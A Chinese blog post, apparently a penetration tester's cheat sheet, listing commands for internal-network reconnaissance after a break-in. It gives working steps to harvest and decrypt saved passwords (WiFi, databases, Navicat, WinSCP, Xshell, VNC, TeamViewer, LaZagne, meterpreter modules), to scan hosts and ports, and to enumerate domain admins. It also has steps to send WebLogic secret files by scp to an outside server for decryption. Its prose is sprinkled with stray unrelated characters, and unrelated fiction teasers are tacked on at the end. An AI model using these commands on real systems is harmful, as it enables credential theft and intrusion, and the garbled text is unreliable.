內(nèi)網(wǎng)信息收集

總結(jié)下內(nèi)網(wǎng)信息收集時用到的方法奈偏,由于是想到什么寫什么勤讽,所以文章比較混亂.....

一楣号、Windows

cmd命令

systeminfo 查看計算機信息
query user 查在線用戶
netstat -ano | find "3389" 查看網(wǎng)絡(luò)連接信息
arp -a 查看arp緩存
route print 查看路由表
wmic product get name,version 查看安裝的軟件
wmic qfe list 查看已安裝的補丁
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe 查看殺軟詳情
wmic bios list full | find /i "vmware" 查看是否為虛擬機
wmic process get caption,executablepath,processid 查看正在運行的進程信息

查看/終止進程:
tasklist /svc
tasklist /s 192.168.80.11 /u admin /p 123 /svc
taskkill /f /im qq.exe
taskkill /pid 2476

快速搜索文件
findstr /c:"DB_USER" /c:"DB_PASSWORD" /si *.php
findstr /c:"user=" /c:"pass=" /c:"pwd=" /c:"password=" /si *.php *.xml

查WiFi密碼

netsh wlan show profile
netsh wlan show profile wifi-name key=clear

查mysql密碼

select Host,User,Password,authentication_string from mysql.user;

查mssql密碼

SELECT name,password_hash FROM master.sys.sql_logins;

提取瀏覽器已保存的密碼

http://www.nirsoft.net/utils/web_browser_password.html  火狐瀏覽器
http://www.nirsoft.net/utils/chromepass.html  谷歌瀏覽器
image.png

提取Navicat已保存的密碼

工具下載地址:
https://github.com/HyperSine/how-does-navicat-encrypt-password

  1. 從注冊表中查詢host/username/pwd
reg query HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\ /s /v host
reg query HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\ /s /v username
reg query HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\ /s /v pwd
image.png
  1. 使用工具進行解密
python NavicatCipher.py dec 5658213B
image.png

提取winscp已保存的密碼

工具下載地址:
https://bitbucket.org/knarf/winscppwd/downloads/winscppwd.exe

  1. 查詢注冊表中winscp保存的密文
shell reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions"
shell reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\root@192.168.80.164"
image.png
  1. 使用winscppwd.exe進行解密
winscppwd.exe root 192.168.80.164 A35C4A54D144F65B7DF0E8F42E3333286D656E726D6A6472646C726D6A682833332EFA7A248229B891A201911C3F588380D6
image.png
  1. 或者直接使用msf中的模塊
meterpreter > run post/windows/gather/credentials/winscp 
image.png

提取Xshell已保存的密碼

Xshell目前主要有5.x和6.x兩個版本庐橙,session文件分別保存在如下位置

  • %userprofile%\Documents\NetSarang\Xshell\Sessions
  • %userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions

解密工具下載地址:
https://github.com/dzxs/Xdecrypt

  1. 查看是否存在xshell配置文件
shell cd "%userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions"&dir
image.png
  1. 讀取xsh文件中的用戶名和密碼的密文
shell type "C:\Users\Administrator\Documents\NetSarang Computer\6\Xshell\Sessions\192.168.80.164.xsh"
image.png
  1. 查詢用戶的SID
shell whoami /user
image.png
  1. 使用腳本進行解密
python Xdecrypt.py -s AdministratorS-1-5-21-464702021-3836885353-1586058702-500 -p "UzQLCHPiipSEypdz5qLORoRblWuytx8aAGFMl3plBK+pi+30QDkGUg=="
image.png
  1. 同樣msf中也有相關(guān)的模塊
meterpreter > run post/windows/gather/credentials/xshell_xftp_password 
image.png

提取SecureCRT已保存的密碼

工具下載地址:
https://github.com/HyperSine/how-does-SecureCRT-encrypt-password.git

提取vnc客戶端的密碼

工具下載地址:
https://www.raymond.cc/blog/crack-or-decrypt-vnc-server-encrypted-password/
以realvnc為例

注冊表位置
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
vncpwd.exe 494015f9a35e8b22
image.png

提取teamviewer的密碼

實際利用的是CVE-2019-18988漏洞鳞上,可以讀取Teamviewer的ID和控制密碼琳水,如果登錄窗口存在密碼還會讀取Email和登錄密碼肆糕。

meterpreter > run post/windows/gather/credentials/teamviewer_passwords
image.png

提取filezilla已保存的密碼

meterpreter > run post/multi/gather/filezilla_client_cred
image.png

使用lazagne導(dǎo)出各種密碼

工具下載地址:https://github.com/AlessandroZ/LaZagne

lazagne.exe browsers -firefox -oN
lazagne.exe browsers
lazagne.exe browsers -h
laZagne.exe all -oN

icmp掃描

for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl"

arp掃描

https://github.com/QbsuranAlang/arp-scan-windows-.git
arp-scan.exe -t 192.168.80.0/24

端口掃描

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1
powershell -exec bypass
Import-Module C:\Users\Administrator\Desktop\Invoke-Portscan.ps1
Invoke-Portscan -Hosts 192.168.80.0/24 -T 4 -Ports "21,22,23,80,1433,1521,3306,3389" | Out-File port_info.txt

域內(nèi)信息收集

net time \\test-lab.lab.com 查看目標主機的時間
net user /domain 查看域內(nèi)的用戶
net accounts /domain 查看域的密碼策略
net view /domain 查看有幾個域
net group /domain 查看域里面的組
net config workstation 查看當前域
net group "domain admins" /domain 查看域管理員
net group "domain controllers" /domain 查看域控制器
net user user2 /domain 查看指定域賬戶的信息
net group "domain computers" /domain 查看域內(nèi)所有主機
wmic computersystem get domain 查看當前域
wmic useraccount get Caption,sid 查看域內(nèi)所有主機的sid

定位域控

  1. 通常域內(nèi)主機DNS地址就是域控地址
  2. ping工作站域DNS名稱進一步確認
ping lab.com
image.png

二、Linux

icmp掃描

for i in 10.28.98.{1..254}; do if ping -c 1 -w 1 $i &>/dev/null; then echo $i is alived; fi; done

端口掃描

推薦一個python腳本在孝,不需要任何三方依賴
https://github.com/ywolf/F-NAScan.git

python F-NAScan.py -h 192.168.80.148 -p port.ini -m 50 -t 10 -n
python F-NAScan.py -h ip.ini -p port.ini -m 50 -t 10
python F-NAScan.py -h 172.21.0 -p 9200 -m 30 -t 10 -n
python F-NAScan.py -h 192.168.1 -p 21,22,80,161,443,445,873,1080,1099,1433,1434,1521,2049,2375,3306,3389,5432,5984,6379,7001,8001,8080,9200,27017 -m 50 -t 10 -n

nmap

  1. 主機發(fā)現(xiàn)
-n 取消反向域名解析
-F 掃描top100端口
--top-ports <number> 掃描開放率最高的number個端口诚啃,默認是1000
-Pn 跳過主機發(fā)現(xiàn)的過程,默認主機在線
-sn 只進行主機發(fā)現(xiàn)私沮,不進行端口掃描始赎,老版本叫-sP
-PR 使用ARP協(xié)議進行主機發(fā)現(xiàn)
nmap -sn -n 192.168.80.0/24
nmap -sn -PR -n 192.168.80.0/24
  1. 端口掃描
nmap -n 192.168.70.248 -p1099 -Pn
nmap -n -sT 192.168.70.248 -p1099 -Pn

查在線用戶/用戶登錄記錄

who
last

配置文件中找數(shù)據(jù)庫的密碼

config.php、web.config等
java的站通常在jdbc文件中有數(shù)據(jù)庫的密碼

locate WEB-INF | grep .properties
locate WEB-INF | grep jdbc.properties
find / -name *.properties 2>/dev/null
find ./ -name "*.properties" | xargs egrep -i "user|pass|pwd|uname|login|db_"

查歷史記錄

.bash_history
.mysql_history
.rediscli_history
.viminfo

查ssh登錄歷史

~/.ssh/known_hosts

查內(nèi)網(wǎng)下的其它主機

arp -a
route -n
cat /proc/net/arp

查SUID可執(zhí)行文件

find / -perm -u=s -type f 2>/dev/null

查系統(tǒng)信息

uname -a
cat /etc/*-release

解密weblogic控制臺的密碼

weblogic的密碼使用AES(老版本3DES)加密仔燕,這兩種加密方式都屬于對稱加密造垛,加密密鑰和解密密鑰相同。所以我們只要找到服務(wù)器上的密文和密鑰晰搀,就可以解密獲得明文密碼五辽。這兩個文件均位于weblogic的domains目錄下,名為SerializedSystemIni.dat和config.xml外恕。

  1. config.xml位于config目錄下奔脐,我們使用scp命令復(fù)制到自己的服務(wù)器上
scp config.xml test@1.1.1.1:/tmp/
  1. SerializedSystemIni.dat位于security目錄下,同樣使用scp命令進行復(fù)制
scp SerializedSystemIni.dat test@1.1.1.1:/tmp/
  1. 使用解密工具進行解密吁讨,這里使用vulhub中提供的工具
    https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password/decrypt

  2. 文件選擇SerializedSystemIni.dat髓迎,密碼為config.xml文件中<node-manager-password-encrypted>的值,如下圖解密成功建丧,得到了明文密碼

image.png
image.png
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末排龄,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌橄维,老刑警劉巖尺铣,帶你破解...
    沈念sama閱讀 216,372評論 6 498
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異争舞,居然都是意外死亡凛忿,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,368評論 3 392
  • 文/潘曉璐 我一進店門竞川,熙熙樓的掌柜王于貴愁眉苦臉地迎上來店溢,“玉大人,你說我怎么就攤上這事委乌〈材粒” “怎么了?”我有些...
    開封第一講書人閱讀 162,415評論 0 353
  • 文/不壞的土叔 我叫張陵遭贸,是天一觀的道長戈咳。 經(jīng)常有香客問我,道長壕吹,這世上最難降的妖魔是什么著蛙? 我笑而不...
    開封第一講書人閱讀 58,157評論 1 292
  • 正文 為了忘掉前任,我火速辦了婚禮耳贬,結(jié)果婚禮上册踩,老公的妹妹穿的比我還像新娘。我一直安慰自己效拭,他們只是感情好暂吉,可當我...
    茶點故事閱讀 67,171評論 6 388
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著缎患,像睡著了一般慕的。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上挤渔,一...
    開封第一講書人閱讀 51,125評論 1 297
  • 那天肮街,我揣著相機與錄音,去河邊找鬼判导。 笑死嫉父,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的眼刃。 我是一名探鬼主播绕辖,決...
    沈念sama閱讀 40,028評論 3 417
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼擂红!你這毒婦竟也來了仪际?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 38,887評論 0 274
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎树碱,沒想到半個月后肯适,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,310評論 1 310
  • 正文 獨居荒郊野嶺守林人離奇死亡成榜,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,533評論 2 332
  • 正文 我和宋清朗相戀三年框舔,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片赎婚。...
    茶點故事閱讀 39,690評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡刘绣,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出惑淳,到底是詐尸還是另有隱情额港,我是刑警寧澤饺窿,帶...
    沈念sama閱讀 35,411評論 5 343
  • 正文 年R本政府宣布歧焦,位于F島的核電站,受9級特大地震影響肚医,放射性物質(zhì)發(fā)生泄漏绢馍。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,004評論 3 325
  • 文/蒙蒙 一肠套、第九天 我趴在偏房一處隱蔽的房頂上張望舰涌。 院中可真熱鬧,春花似錦你稚、人聲如沸瓷耙。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,659評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽搁痛。三九已至,卻和暖如春宇弛,著一層夾襖步出監(jiān)牢的瞬間鸡典,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,812評論 1 268
  • 我被黑心中介騙來泰國打工枪芒, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留彻况,地道東北人。 一個月前我還...
    沈念sama閱讀 47,693評論 2 368
  • 正文 我出身青樓舅踪,卻偏偏與公主長得像纽甘,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子抽碌,可洞房花燭夜當晚...
    茶點故事閱讀 44,577評論 2 353